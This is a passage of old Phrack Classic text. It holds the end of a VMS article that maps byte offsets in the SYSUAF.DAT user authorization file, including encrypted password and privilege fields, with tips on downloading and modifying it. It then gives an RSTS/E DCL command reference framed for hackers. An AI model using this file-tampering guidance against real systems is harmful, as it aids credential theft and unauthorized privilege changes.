  3702.         DATA_FILL               7
  3703.         DATA_KEY_COMPRESSION    0
  3704.         DATA_RECORD_COUNT       4
  3705.         DATA_SPACE_OCCUPIED     2
  3706.         DEPTH                   1
  3707.         DUPLICATES_PER_SIDR     0
  3708.         INDEX_COMPRESSION       0
  3709.         INDEX_FILL              2
  3710.         INDEX_SPACE_OCCUPIED    2
  3711.         LEVEL1_RECORD_COUNT     1
  3712.         MEAN_DATA_LENGTH        15
  3713.         MEAN_INDEX_LENGTH       6
  3714.  
  3715. ANALYSIS_OF_KEY 2
  3716.         DATA_FILL               8
  3717.         DATA_KEY_COMPRESSION    0
  3718.         DATA_RECORD_COUNT       4
  3719.         DATA_SPACE_OCCUPIED     2
  3720.         DEPTH                   1
  3721.         DUPLICATES_PER_SIDR     0
  3722.         INDEX_COMPRESSION       0
  3723.         INDEX_FILL              2
  3724.         INDEX_SPACE_OCCUPIED    2
  3725.         LEVEL1_RECORD_COUNT     1
  3726.         MEAN_DATA_LENGTH        19
  3727.         MEAN_INDEX_LENGTH       10
  3728.  
  3729. ANALYSIS_OF_KEY 3
  3730.         ! This index is uninitialized - there are no records.
  3731.  
  3732. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  3733.  
  3734. Examination
  3735. ~~~~~~~~~
  3736.  
  3737.         Generally, an interactive user would use the AUTHORIZE utility to
  3738. modify or examine the UAF, while a program would use the $GETUAI system
  3739. services (get user authorization information service) to examine the file.
  3740. The $GETUAI system services reference provide an excellent description of what
  3741. fields the UAF contains, and how many bytes are used within the file to store
  3742. each of those fields.  However, it may not be within your realm of skills to
  3743. program using system services.  It would probably be considerably easier to
  3744. use a sector editor/browser to locate values within the UAF.  You could use a
  3745. sector editor/browser online (such as VFE.EXE), or you you might choose to
  3746. download the UAF and use an editor/browse for your personal computer.
  3747. Regardless of which method you choose, you will have to know the offset of
  3748. each field within the user authorization file.  This is what I have provided
  3749. for you.
  3750.  
  3751.         The contents of the UAF under VMS release 5.3-1 are as follows:
  3752.  
  3753. Offset   Description                                            Length
  3754. -----------------------------------------------------------------------------
  3755.    0     Record Header                                             4
  3756.    4     Username (loginid)                                       32
  3757.   36     Member UIC - Mem UIC decimal   1 = 0100                   2
  3758.                       Mem UIC decimal  10 = 0A00
  3759.                       Mem UIC decimal 256 = FF01
  3760.  
  3761.   38     Group UIC  - Same as format as member UIC                 2
  3762.  
  3763.          Note:  UICs as displayed in the VMS environment
  3764.          are OCTAL.  A UIC of [010,001] would be saved as
  3765.          '01000800' in bytes 36-39 (offset).
  3766.  
  3767.   40     Nulls                                                    12
  3768.   52     Account name                                             32
  3769.   84     1 byte - value = length of owner                          1
  3770.   85     Owner                                                    31
  3771.  116     1 byte - value = length of device                         1
  3772.  117     Device (default disk device)                             31
  3773.  148     1 byte - length of default (SYS$LOGIN) directory          1
  3774.  149     Default (SYS$LOGIN) directory name                       63
  3775.  212     1 byte - length of default login command file             1
  3776.  213     Default login command file                               63
  3777.  276     1 byte - length of default CLI                            1
  3778.  277     Default command language interpeter                      31
  3779.  
  3780.          Note: CLI is assumed to be in SYS$SYSTEM directory
  3781.          and have an .EXE extension.
  3782.  
  3783.  308     1 byte - length of user defined CLI tables                1
  3784.  309     User defined CLI table name                              31
  3785.  340     Encrypted primary password                                8
  3786.  348     Encrypted secondary password                              8
  3787.  356     Number of login fails                                     2
  3788.  358     Password encryption salt                                  2
  3789.  360     Encryption algorithm code byte - primary password         1
  3790.  361     Encryption algorithm code byte - secondary password       1
  3791.  362     Password minimum length                                   1
  3792.  363     Filler (1 byte)                                           1
  3793.  364     Account expiration date                                   8
  3794.  372     Password lifetime                                         8
  3795.  380     Password change date/time - primary password              8
  3796.  388     Password change date/time - secondary password            8
  3797.  396     Last interactive login date/time                          8
  3798.  404     Last non-interactive login date/time                      8
  3799.  412     Authorize priviledges                                     8
  3800.  420     Default priviledges                                       8
  3801.  428     Filler (40 bytes)                                        40
  3802.  
  3803.  468     Login Flags bits as follows:                              4
  3804.  
  3805.            7  6  5  4  3  2  1  0
  3806.          -------------------------
  3807.          |  |  |  |  |  |  |  |  |
  3808.          -------------------------
  3809.  
  3810.          Byte Offset 468:
  3811.  
  3812.          Bit 0            - User can not use CTRL-Y
  3813.          Bit 1            - User is restricted to default
  3814.                             command interpeter
  3815.          Bit 2            - SET PASSWORD command is disabled
  3816.          Bit 3            - Prevent user from changing any
  3817.                             defaults at login
  3818.          Bit 4            - User account is disabled
  3819.          Bit 5            - User will not receive the login
  3820.                             welcome message
  3821.          Bit 6            - Announcement of new mail is suppressed
  3822.          Bit 7            - Mail delivery to user is disabled
  3823.  
  3824.          Byte Offset 469:
  3825.  
  3826.          Bit 0            - User is required to use generated
  3827.                             passwords
  3828.          Bit 1            - Primary password is expired
  3829.          Bit 2            - Secondary password is expired
  3830.          Bit 3            - All actions are audited
  3831.          Bit 4            - User will not receive last login
  3832.                             messages
  3833.          Bit 5            - User can not reconnect to existing
  3834.                             processes
  3835.          Bit 6            - User can only login to terminals
  3836.                             defined by the automatic login
  3837.                             facility (ALF)
  3838.          Bit 7            - User is required to change expired
  3839.                             passwords
  3840.  
  3841.          Byte Offset 470:
  3842.  
  3843.          Bit 0            - User is restricted to captive account
  3844.          Bit 1            - Prevent user from executing RUN, MCR
  3845.                             commands, or foreign commands at the
  3846.                             DCL level
  3847.          Bits 2-7         - Reserved for future use
  3848.  
  3849.          Byte Offset 471:
  3850.  
  3851.          Bits 0-7         - Reserved for future use
  3852.  
  3853.  
  3854.          Note On Access Bytes:
  3855.  
  3856.          Each bit set represents a 1-hour period, from bit 0 as
  3857.          midnight to 1 a.m. to bit 23 as 11 p.m. to midnight.
  3858.  
  3859.  472     Network access bytes - primary days                       3
  3860.  475     Network access bytes - seconday days                      3
  3861.  478     Batch access bytes - primary days                         3
  3862.  481     Batch access bytes - seconday days                        3
  3863.  484     Local access bytes - primary days                         3
  3864.  487     Local access bytes - seconday days                        3
  3865.  490     Dialup access bytes - primary days                        3
  3866.  493     Dialup access bytes - secondary days                      3
  3867.  496     Remote access bytes - primary days                        3
  3868.  499     Remote access bytes - seconday days                       3
  3869.  
  3870.  502     Filler (12 bytes)                                        12
  3871.  514     Prime days                                                1
  3872.  
  3873.          Bits 0-7 toggled on represents primedays, respective
  3874.          to Mon, Tue, ..., Sun.
  3875.  
  3876.  515     Filler (1 byte)                                           1
  3877.  516     Default base priority                                     1
  3878.  517     Maximum job queue priority                                1
  3879.  518     Active process limit                                      2
  3880.  520     Max. number of interactive, detached, and batch jobs      2
  3881.  524     Detached process limit                                    2
  3882.  526     Subprocess creation limit                                 2
  3883.  528     Buffered I/O count                                        2
  3884.  530     Timer queue entry limit                                   2
  3885.  532     AST queue limit                                           2
  3886.  534     Lock queue limit                                          2
  3887.  536     Open file limit                                           4
  3888.  538     Shared file limit                                         2
  3889.  540     Working set quota                                         4
  3890.  548     Working set extent                                        4
  3891.  552     Paging file quota                                         4
  3892.  556     Maximum CPU time limit (in 10-milliseconds)               4
  3893.  560     Buffered I/O byte limit                                   4
  3894.  564     Paged buffer I/O byte count limit                         4
  3895.  568     Initial byte quota (jobwide logical name table uses)      4
  3896.  572     Filler (72 bytes)                                        72
  3897.  
  3898.         Dates and times are stored as 8 bytes representing the number of
  3899. seconds elapsed since November 17, 1858, 12:00:00 a.m.
  3900.  
  3901.         Earlier versions of the VMS UAF will contain much of the same data,
  3902. which should be at the same offset as listed above.
  3903.  
  3904.  
  3905.         Should you decide to attempt to modify the SYSUAF.DAT file, keep in
  3906. mind that if you download the file, when you upload it, it will not be the
  3907. same as it was before; it will not be an indexed file.  You *might* be able
  3908. to create an .FDL file (using ANALYZE/RMS/FDL SYSUAF.DAT), and use that .FDL
  3909. file to convert it back to an indexed file
  3910. (with CONVERT/FDL=SYSUAF.FDL UPLOAD_UAF.DAT NEW_UAF.DAT), but chances that it
  3911. will contain the proper indexing and file attributes are slim.  Remember when
  3912. altering the SYSUAF.DAT file to keep a copy around (on the system) in case
  3913. you need to repair the damage.
  3914.  
  3915.  
  3916. -PHz
  3917.  
  3918. Feel free to make any comments or corrections to the following address:
  3919.  
  3920. [phz@judy.indstate.edu]
  3921. _______________________________________________________________________________
  3922.  
  3923.                               ==Phrack Classic==
  3924.  
  3925.                      Volume Three, Issue 32, File #9 of 12
  3926.  
  3927.  
  3928.                           /-?!?!?!?!?!?!?!?!?!?!?!-\
  3929.                          /EZ?!                  ?!AH\
  3930.                         /APE?!                  ?!ZAP\
  3931.                        /AZHP?!      RSTS/E      ?!EZHA\
  3932.                       / ZEAH?!                  ?!PEAZ \
  3933.                  [*>RSTS PZA?!        by        ?!HPZ LIVES<*]
  3934.                       \ PHEZ?!                  ?!AHEE /
  3935.                        \HAPE?!   Crimson Death  ?!ZAPP/
  3936.                         \ZHP?!                  ?!EZH/
  3937.                          \AH?!                  ?!PE/
  3938.                           \-?!?!?!?!?!?!?!?!?!?!?!-/
  3939.  
  3940.  
  3941. Ok, ok... Just what you wanted... a file of RSTS!!! Hah...
  3942. Well.. One would be suprised on how many RSTS systems are still around
  3943. on variuos X.25 networks, not to mention they are soooo much fun!
  3944. Here is a little list of some various commands that is good to keep
  3945. lying around just to use as a reference of just for you nostaglic type
  3946. people like me.  So enjoy, and if you were never involved in hacking
  3947. when RSTS was popular, you really missed something.
  3948. -------------------------------------------------------------------------------
  3949.  
  3950. *ALLOCATE
  3951. The ALLOCATE command reserves a physical device for your use during
  3952. the current session and optionally establishes a logical name for
  3953. the device. Once a device has been allocated, other users cannot access
  3954. the device until you specifically deallocate it or log out.  You can
  3955. allocate a device only when it is not allocated by another job.
  3956.  
  3957. Format
  3958.  
  3959. ALLOCATE device-name[:] [logical-name[:]]
  3960.  
  3961. Prompts
  3962.  
  3963. Device: device-name
  3964.  
  3965. See also:  ASSIGN, DEALLOCATE
  3966.  
  3967. *APPEND
  3968. The APPEND command adds the contents of one or more files to the end
  3969. of the file you specify. APPEND is similar in syntax and function to
  3970. the COPY command.
  3971.  
  3972. Format
  3973.  
  3974. APPEND [node::]input-file-spec[,...]  [node::]output-file-spec
  3975.  
  3976. Command Qualifiers                  Defaults
  3977.  
  3978.    /[NO]LOG                         /LOG
  3979.    /[NO]QUERY                       /NOQUERY
  3980.  
  3981. Prompts
  3982.  
  3983. From: input-file-spec[,...]
  3984.  
  3985. To: output-file-spec
  3986.  
  3987. See also:  COPY
  3988.  
  3989. *ASSIGN
  3990. The ASSIGN command lets you relate a logical name to a directory
  3991. or to a physical device.  The names you ASSIGN stay in effect until
  3992. you log out, or log into another account or until you DEASSIGN the name.
  3993.  
  3994. Format
  3995.  
  3996. ASSIGN device-name:[[ppn]] logical-name[:]
  3997.  
  3998. Prompts
  3999.  
  4000. Device: device-name:[[ppn]]
  4001.  
  4002. Logical name: logical-name[:]
  4003.  
  4004. *BASIC
  4005. The BASIC command invokes the BASIC-PLUS or BASIC-PLUS-2 programming
  4006. environment, depending on the qualifiers you use and the system's
  4007. default. It also prepares RSTS/E for the development of BASIC programs.
  4008.  
  4009. Format
  4010.  
  4011. BASIC
  4012.  
  4013. Command Qualifiers                  Comments
  4014.  
  4015.    /BP2                             Invokes the BASIC-PLUS-2
  4016.                                     programming environment
  4017.    /BPLUS                           Invokes the BASIC-PLUS
  4018.                                     programming environment
  4019.  
  4020. All subsequent commands are interpreted as BASIC programming commands,
  4021. until you type the following command to return to the DCL keyboard
  4022. monitor:  DCL <ret>
  4023.  
  4024. *CCL
  4025. Format
  4026.  
  4027. CCL ccl-command
  4028.  
  4029. The Concise Command Language (CCL) allows you to enter a command name
  4030. rather than type RUN and a program name.
  4031.  
  4032. You can type CCL commands directly after DCL's dollar prompt ($).
  4033. The format of the CCL command is defined by your system manager.
  4034. For details about the use of a CCL command, refer to the
  4035. documentation written for your site.
  4036.  
  4037. When you are using the DCL Keyboard Monitor, DCL commands take
  4038. precedence over CCL commands.  If your system manager gives a CCL
  4039. command the same name as a DCL command, you must type the prefix
  4040. "CCL" a space, and the CCL command itself.
  4041.  
  4042. For example, a CCL command name "DIRECTORY" and the DCL command
  4043. "DIRECTORY" may produce different results depending on how the CCL
  4044. command works at your site.  To use the CCL version, type:
  4045.     $  CCL DIRECTORY <ret>
  4046.  
  4047. *COBOL
  4048. The COBOL command compiles a COBOL-81 program.  (Only one source file at a
  4049. time can be compiled with COBOL-81.)
  4050.  
  4051.  
  4052. Format:
  4053.  
  4054. COBOL file-spec
  4055.  
  4056. Qualifiers                        Defaults
  4057.  
  4058.    /[NO]ANSI_FORMAT
  4059.    /[NO]CHECK
  4060.    /[NO]CROSS_REFERENCE
  4061.    /LIST[=listfile]               /NOLIST
  4062.    /NOLIST
  4063.    /[NO]MAP
  4064.    /NAMES=aa                      /NAMES=SC
  4065.    /OBJECT[=objfile]              /OBJECT
  4066.    /NOOBJECT
  4067.  
  4068. Prompts
  4069.  
  4070. File:  file-spec
  4071.  
  4072. See also:  LINK
  4073.  
  4074. *COPY
  4075. The COPY command duplicates one or more existing files.
  4076. You can use COPY to:
  4077.  
  4078. - copy one file to another file
  4079. - merge (concatenate) more than one file into a single file
  4080. - copy a group of files to another group of files
  4081.  
  4082. Format
  4083.  
  4084. COPY [node::]input-file-spec[,...]  [node::]output-file-spec
  4085.  
  4086. Qualifiers                          Defaults
  4087.  
  4088.    /ALLOCATION=n
  4089.    /[NO]CONTIGUOUS       (N)
  4090.    /[NO]LOG              (N)        /LOG
  4091.    /[NO]OVERLAY                     /NOOVERLAY
  4092.    /PROTECTION=n
  4093.    /[NO]QUERY            (N)        /NOQUERY
  4094.    /[NO]REPLACE          (N)        /NOREPLACE
  4095.  
  4096. (N) denotes a qualifier that you can use in network operations.
  4097.  
  4098. Prompts
  4099.  
  4100. From: input-file-spec[,...]
  4101.  
  4102. To: output-file-spec
  4103.  
  4104. *CREATE
  4105. The CREATE command allows you to enter text and save it as a file.
  4106.  
  4107. Format
  4108.  
  4109. CREATE file-spec
  4110.  
  4111. Prompts
  4112.  
  4113. File: file-spec
  4114.  
  4115. Once you have entered the file-spec, press RETURN and you may start
  4116. typing text.  Press <CTRL/Z> when you have finished entering text.
  4117.  
  4118. Command Qualifiers
  4119.  
  4120.    /ALLOCATION=n
  4121.    /[NO]CONTIGUOUS
  4122.    /PROTECTION=n
  4123.    /[NO]REPLACE
  4124.  
  4125. See also:  EDIT
  4126.  
  4127. *DEALLOCATE
  4128. The DEALLOCATE command releases a device that you reserved for private
  4129. use, so that other users may have access to it. (However, DEALLOCATE
  4130. does not deassign any logical name you may have set up for the device.)
  4131.  
  4132. Format
  4133.  
  4134. DEALLOCATE device-name[:]
  4135.  
  4136. Command Qualifiers                  Defaults
  4137.  
  4138.    /ALL                             none
  4139.  
  4140. Prompts
  4141.  
  4142. Device: device-name[:]
  4143.  
  4144. See also:  ALLOCATE
  4145.  
  4146. *DEASSIGN
  4147. The DEASSIGN command cancels logical name assignments you made with
  4148. the ASSIGN or ALLOCATE commands.
  4149.  
  4150. Format
  4151.  
  4152. DEASSIGN [logical-name[:]]
  4153.  
  4154. Command Qualifiers                  Defaults
  4155.  
  4156.    /ALL
  4157.  
  4158. Prompts
  4159.  
  4160. Logical name: logical-name[:]
  4161.  
  4162. See also:  ASSIGN, DEALLOCATE
  4163.  
  4164. *DELETE/ENTRY
  4165. The DELETE/ENTRY command deletes jobs from the queue that have not
  4166. yet begun processing or jobs that are currently being processed.
  4167.  
  4168. Format
  4169.  
  4170. DELETE/ENTRY=job-number [queue-name[:]]
  4171.  
  4172. Command Qualifiers                  Defaults
  4173.  
  4174.    /BATCH
  4175.  
  4176. Prompts
  4177.  
  4178. Queue: queue-name[:]
  4179.  
  4180. If you do not specify a queue name, LP0: is assumed.
  4181.  
  4182. See also:  PRINT, SUBMIT, DELETE/JOB, SET QUEUE/ENTRY
  4183.  
  4184. *DELETE/JOB
  4185.  
  4186. The DELETE/JOB command uses the name of a job to cancel a request
  4187. to the print or batch queue.
  4188.  
  4189. Format
  4190.  
  4191. DELETE/JOB=job-name [queue-name[:]]
  4192.  
  4193. Command Qualifiers                  Defaults
  4194.  
  4195.    /BATCH
  4196.  
  4197. For example, if you decide after you make your print request that you
  4198. do not want a hard copy of the file after all, you can use the
  4199. DELETE/JOB command to withdraw your request.  (If the file is printed
  4200. before you enter the DELETE/JOB command, your request is too late.
  4201. However, it works if your file is in the middle of printing: the file
  4202. stops printing.)
  4203.  
  4204. See also:  PRINT, SUBMIT, DELETE/ENTRY, SET QUEUE/JOB
  4205.  
  4206. *DELETE
  4207. The DELETE command permanently removes a file from your account.
  4208.  
  4209. Format
  4210.  
  4211. DELETE [node::]file-spec[,...]
  4212.  
  4213. Command Qualifiers                 Defaults
  4214.  
  4215.    /BEFORE=date
  4216.    /CREATED                        /CREATED
  4217.    /[NO]LOG                        /LOG
  4218.    /MODIFIED
  4219.    /[NO]QUERY                      /NOQUERY
  4220.    /SINCE=date
  4221.  
  4222. Prompts
  4223.  
  4224. File: [node::]file-spec[,...]
  4225.  
  4226. *DIBOL
  4227.  
  4228. The DIBOL command compiles a DIBOL-11 program.  You can include up to
  4229. six source file specifications to be compiled into a single object
  4230. file with the DIBOL compiler.
  4231.  
  4232. Format
  4233.  
  4234. DIBOL filespec[,...]
  4235.  
  4236. File Qualifiers                  Defaults
  4237.  
  4238.    /LIST[=listfile]              /NOLIST
  4239.    /NOLIST
  4240.    /OBJECT[=objfile]             /OBJECT
  4241.    /NOOBJECT
  4242.    /WARNINGS                     /WARNINGS
  4243.    /NOWARNINGS
  4244.  
  4245. See also:  LINK
  4246.  
  4247. *DIFFERENCES
  4248. The DIFFERENCES command compares two files and lists any sections
  4249. of text that differ between the two files.
  4250.  
  4251. Format
  4252.  
  4253. DIFFERENCES input-file-spec  compare-file-spec
  4254.  
  4255. Command Qualifiers                  Defaults
  4256.  
  4257.    /IGNORE=BLANKLINES
  4258.    /MATCH=size                      /MATCH=3
  4259.    /MAXIMUM_DIFFERENCES=n
  4260.    /OUTPUT[=file-spec]
  4261.  
  4262. Prompts:
  4263.  
  4264. File 1: input-file-spec
  4265.  
  4266. File 2: compare-file-spec
  4267.  
  4268. *DIRECTORY
  4269. The DIRECTORY command displays information about files.
  4270. Use the TYPE command to display the contents of individual files.
  4271.  
  4272. Format
  4273.  
  4274. DIRECTORY [node::][file-spec[,...]]
  4275.  
  4276. Command Qualifiers                  Defaults
  4277.  
  4278.    /BEFORE=date
  4279.    /BRIEF                           /BRIEF
  4280.    /CREATED                         /CREATED
  4281.    /DATE[=CREATED]                  /NODATE
  4282.         [=MODIFIED]
  4283.         [=ALL]
  4284.    /NODATE
  4285.    /FULL                            /BRIEF
  4286.    /MODIFIED                        /CREATED
  4287.    /OUTPUT=outfile
  4288.    /[NO]PROTECTION                  /PROTECTION
  4289.    /SINCE=date
  4290.    /SIZE[=ALLOCATION]               /SIZE=USED
  4291.         [=USED]
  4292.    /NOSIZE
  4293.    /TOTAL
  4294.  
  4295.  
  4296. *DISMOUNT
  4297. Releases a disk or tape previously accessed with a MOUNT command.
  4298. You issue this command before you take the drive off line, or before
  4299. you physically dismount the tape or disk.
  4300.  
  4301. The DISMOUNT command deallocates the device if it was allocated to
  4302. you.  (On some systems, dismounting a disk requires privileges.)
  4303. You cannot DISMOUNT a device if there are open files on it.  If you
  4304. try, RSTS/E displays the message:
  4305.  
  4306. ?Account or device in use
  4307.  
  4308. Format
  4309.  
  4310. DISMOUNT  device-name[:] [label]
  4311.  
  4312. Prompts
  4313.  
  4314. Device:  device-name[:]
  4315.  
  4316. See also:  MOUNT, DEALLOCATE
  4317.  
  4318. *EDIT
  4319. The EDIT command starts the EDT editor program, which lets
  4320. you create and edit text files.
  4321.  
  4322. Format
  4323.  
  4324. EDIT file-spec
  4325.  
  4326. Command Qualifiers                  Defaults
  4327.  
  4328.    /COMMAND[=file-spec]             /COMMAND=EDTINI.EDT
  4329.    /NOCOMMAND                       /COMMAND=EDTINI.EDT
  4330.    /JOURNAL[=file-spec]             /JOURNAL
  4331.    /NOJOURNAL                       /JOURNAL
  4332.    /OUTPUT[=outfile]                /OUTPUT
  4333.    /NOOUTPUT                        /OUTPUT
  4334.    /[NO]READ_ONLY                   /NOREAD_ONLY
  4335.    /[NO]RECOVER                     /NORECOVER
  4336.    /EDT                             /EDT
  4337.  
  4338. Prompts
  4339.  
  4340. File: file-spec
  4341.  
  4342. *FORTRAN
  4343. The FORTRAN command compiles up to six FORTRAN source files into
  4344. a single object file.
  4345.  
  4346. There are three FORTRAN compilers available on RSTS/E:
  4347.  
  4348.   Command               Invokes
  4349.  
  4350. FORTRAN/FOR            FORTRAN-IV
  4351. FORTRAN/F4P            FORTRAN-IV-PLUS
  4352. FORTRAN/F77            FORTRAN-77
  4353.  
  4354. FORTRAN/F77 is the default, unless your system manager has changed it.
  4355.  
  4356. Qualifiers which you may use with FORTRAN-IV are as follows:
  4357.  
  4358. Format
  4359.  
  4360. FORTRAN/FOR file-spec[,...]
  4361.  
  4362. Command Qualifiers
  4363.  
  4364.    /CODE:EAE
  4365.          EIS
  4366.          FIS
  4367.          THR
  4368.    /[NO]D_LINES
  4369.    /[NO]I4
  4370.    /[NO]LINENUMBERS
  4371.    /LIST[=listfile]
  4372.    /NOLIST
  4373.    /[NO]MACHINE_CODE
  4374.    /OBJECT[=objfile]
  4375.    /NOOBJECT
  4376.    /[NO]OPTIMIZE
  4377.    /[NO]WARNINGS
  4378.  
  4379. Qualifiers which you may use with FORTRAN-IV-PLUS or FORTRAN-77
  4380. are as follows:
  4381.  
  4382. Format
  4383.  
  4384. FORTRAN/F4P file-spec[,...]   or FORTRAN/F77 file-spec[,...]
  4385.  
  4386. Command Qualifiers                 Defaults
  4387.  
  4388.    /[NO]CHECK                      /CHECK
  4389.    /CONTINUATIONS=n                /CONTINUATIONS=19
  4390.    /[NO]D_LINES                    /NOD_LINES
  4391.    /[NO]I4                         /NO14
  4392.    /LIST[=listfile]                /NOLIST
  4393.    /NOLIST
  4394.    /[NO]MACHINE_CODE               /NOMACHINE_CODE
  4395.    /OBJECT[=objfile]               /OBJECT
  4396.    /NOOBJECT
  4397.    /[NO]WARNINGS                   /WARNINGS
  4398.    /WORK_FILES=n                   /WORK_FILES=2
  4399.  
  4400. Prompts
  4401.  
  4402. File:   file-spec[,...]
  4403.  
  4404. See also:  LINK
  4405.  
  4406. *HELP
  4407. Help can be obtained on a particular topic by typing:
  4408.  
  4409.      HELP topic subtopic subsubtopic
  4410.  
  4411. A topic can have the following format:
  4412.  
  4413. 1) An alphanumeric string (e.g. a command name, option, etc.)
  4414. 2) Same preceded by a "/"
  4415. 3) The match-all symbol "*"
  4416.  
  4417. Example:
  4418.  
  4419. HELP COPY
  4420.  
  4421. The RSTS/E DCL User's Guide contains a complete description of all
  4422. DCL commands supported on RSTS/E.
  4423.  
  4424. *INITIALIZE
  4425. Deletes any data on a tape and writes a new label.
  4426.  
  4427. The INITIALIZE command allocates the tape drive if it is not
  4428. already allocated.
  4429.  
  4430. Format
  4431.  
  4432. INITIALIZE device-name[:] [label]
  4433.  
  4434. Qualifiers
  4435.  
  4436.    /FORMAT=ANSI
  4437.    /FORMAT=DOS
  4438.    /DENSITY=nnn
  4439.  
  4440. Prompts
  4441.  
  4442.    Device:  magtape[:]
  4443.    Label:   [label]
  4444.  
  4445. See also:  MOUNT, DISMOUNT
  4446.  
  4447. *LINK
  4448. The LINK command links together object files to produce an
  4449. executable program.  You can also specify an overlay structure
  4450. for the program.
  4451.  
  4452. Format
  4453.  
  4454. LINK file-spec[,...]
  4455.  
  4456. Language Qualifiers                  Comments
  4457.  
  4458. Only one of the following may be specified:
  4459.  
  4460.    /BASIC or /BP2                   BASIC-PLUS-2
  4461.    /COBOL or /C81                   COBOL-81
  4462.    /DIBOL
  4463.    /F4P                             FORTRAN-IV-PLUS
  4464.    /F77                             FORTRAN-77
  4465.    /FORTRAN                         FORTRAN-IV
  4466.    /RT11                            MACRO/RT11
  4467.  
  4468. If no language qualifier is specified, /BASIC (for BASIC-PLUS-2)
  4469. is assumed, unless your system manager has changed the default.
  4470.  
  4471.     Additional
  4472. Command Qualifiers                  Defaults
  4473.  
  4474.    /EXECUTABLE[=file-spec]          /EXECUTABLE
  4475.    /NOEXECUTABLE
  4476.    /[NO]FMS                         /NOFMS
  4477.    /MAP[=file-spec]                 /NOMAP
  4478.    /NOMAP
  4479.    /STRUCTURE
  4480.    /[NO]DMS                         /NODMS
  4481.  
  4482. Prompts
  4483.  
  4484. Files: file-spec
  4485.  
  4486. If /STRUCTURE was specified, you will be
  4487. prompted for the names of the input files
  4488. and overlay structure to use, e.g.,
  4489.  
  4490. ROOT files:  file-spec[,...]
  4491. Root PSECTs: [PSECT-name[,...]]
  4492. Overlay:     [file-spec[,...][+]]
  4493.  
  4494. You can specify /STRUCTURE if the program is written in
  4495. BASIC-PLUS-2, DIBOL, FORTRAN-IV-PLUS, or FORTRAN-77.  You
  4496. cannot specify /STRUCTURE if the program is written in
  4497. COBOL, FORTRAN-IV, or MACRO/RT11.
  4498.  
  4499. See also:  COBOL, DIBOL, BASIC, MACRO, FORTRAN
  4500.  
  4501. *LOGOUT
  4502. The LOGOUT command ends your session at the terminal.
  4503.  
  4504. Format
  4505.  
  4506. [LO]GOUT
  4507.  
  4508. Command Qualifiers
  4509.  
  4510.    /BRIEF
  4511.    /FULL (default)
  4512.  
  4513. If you include the /BRIEF qualifier after the LOGOUT command,
  4514. RSTS/E ends your session at the terminal without displaying a
  4515. message.  If you include the /FULL, or simply type LOGOUT, RSTS/E
  4516. displays information about the status of your account.
  4517.  
  4518. *MACRO
  4519. Invokes a MACRO-11 assembler.  You can include up to six file
  4520. specifications with the MACRO command.
  4521.  
  4522. On RSTS/E you can use either MACRO/RT11 or MACRO/RSX11.  The default
  4523. is MACRO/RSX11 unless your system manager has changed it.
  4524.  
  4525. Format
  4526.  
  4527. MACRO/RT11 filespec[,...]
  4528.  
  4529.         OR
  4530.  
  4531. MACRO/RSX11 filespec[,...]
  4532.  
  4533. Command Qualifiers
  4534.  
  4535.    /LIST[=listfile]
  4536.    /NOLIST
  4537.    /OBJECT[=objfile]
  4538.    /NOOBJECT
  4539.  
  4540. File Qualifiers
  4541.  
  4542.    /LIBRARY
  4543.  
  4544. See also:   LINK
  4545.  
  4546. *MOUNT
  4547. The MOUNT command prepares a tape or disk for processing by system
  4548. commands or user programs. (You do not always have to MOUNT a tape
  4549. before using it.) On some systems, mounting a disk requires privilege.
  4550.  
  4551. Format
  4552.  
  4553. MOUNT device-name[:] [label]
  4554.  
  4555. Command Qualifiers                  Defaults
  4556.  
  4557.    /[NO]WRITE                       /WRITE
  4558.  
  4559. Qualifiers for Tapes                Defaults
  4560.  
  4561.    /FORMAT=ANSI
  4562.    /FORMAT=DOS
  4563.    /FORMAT=FOREIGN
  4564.    /DENSITY=nnn
  4565.  
  4566. Prompts
  4567.  
  4568. Device: device-name[:]
  4569. Label: volume-label
  4570.  
  4571. See also:  DISMOUNT, INITIALIZE, ALLOCATE
  4572.  
  4573. *PRINT
  4574. The PRINT command queues a file for printing, either on a default
  4575. system printer or on a device you specify. A queue is the list of
  4576. files to be printed.
  4577.  
  4578. Format
  4579.  
  4580. PRINT file-spec[,...]
  4581.  
  4582. Command Qualifiers                  Defaults
  4583.  
  4584.    /AFTER=date-time
  4585.    /FORMS=type                      /FORMS=NORMAL
  4586.    /JOB_COUNT=n                     /JOB_COUNT=1
  4587.    /NAME=job-name
  4588.    /PRIORITY=n
  4589.    /QUEUE=queue-name[:]             /QUEUE=LP0:
  4590.  
  4591. File Qualifiers                     Defaults
  4592.  
  4593.    /COPIES=n                        /COPIES=1
  4594.    /[NO]DELETE                      /NODELETE
  4595.  
  4596. Prompts
  4597.  
  4598. File: file-spec[,...]
  4599.  
  4600. See also:  DELETE/JOB, SET QUEUE/JOB
  4601.  
  4602. *RENAME
  4603. The RENAME command changes the file name or file type of an
  4604. existing file.
  4605.  
  4606. Format
  4607.  
  4608. RENAME old-file-spec[,...]  new-file-spec
  4609.  
  4610. Qualifiers                    Defaults
  4611.  
  4612.    /[NO]LOG                   /LOG
  4613.    /[NO]QUERY                 /NOQUERY
  4614.    /[NO]REPLACE               /NOREPLACE
  4615.    /PROTECTION=n              /PROTECTION=60
  4616.  
  4617. Prompts
  4618.  
  4619. From: input-file-spec[,...]
  4620.  
  4621. To: output-file-spec
  4622.  
  4623. See also:  COPY, DELETE
  4624.  
  4625. *REQUEST
  4626. The REQUEST command displays a message at a system operator's terminal.
  4627.  
  4628. Format
  4629.  
  4630. REQUEST message-text
  4631.  
  4632. When you use the REQUEST command to send a message to an operator,
  4633. the message is displayed at the operator services console.
  4634.  
  4635. *RUN
  4636.  
  4637. The RUN command runs an executable file.
  4638.  
  4639. Format
  4640.  
  4641. RUN file-spec
  4642.  
  4643. Prompts
  4644.  
  4645. Program:  file-spec
  4646.  
  4647. *SET HOST
  4648. The SET HOST command lets you log into another computer from the
  4649. system you first logged into.
  4650.  
  4651. Format
  4652.  
  4653. SET HOST node[::]
  4654.  
  4655. Prompts
  4656.  
  4657. Node: node-name
  4658.  
  4659. *SET PROTECTION
  4660. The SET PROTECTION command specifies the protection code of a file.
  4661. You assign a protection code to determine who else, if anyone, can
  4662. have access to your files.
  4663.  
  4664. Format
  4665.  
  4666. SET PROTECTION[=n] [file-spec,...]
  4667.  
  4668. Qualifiers
  4669.  
  4670.    /DEFAULT
  4671.    /[NO]QUERY
  4672.    /[NO]LOG
  4673.  
  4674. Prompts
  4675.  
  4676. Protection code:  n
  4677. Files:  file-spec
  4678.  
  4679. If you use SET PROTECTION/DEFAULT, RSTS/E assigns the protection
  4680. code you specify to all files you create during the current session.
  4681. However, do not include a file specification when you use
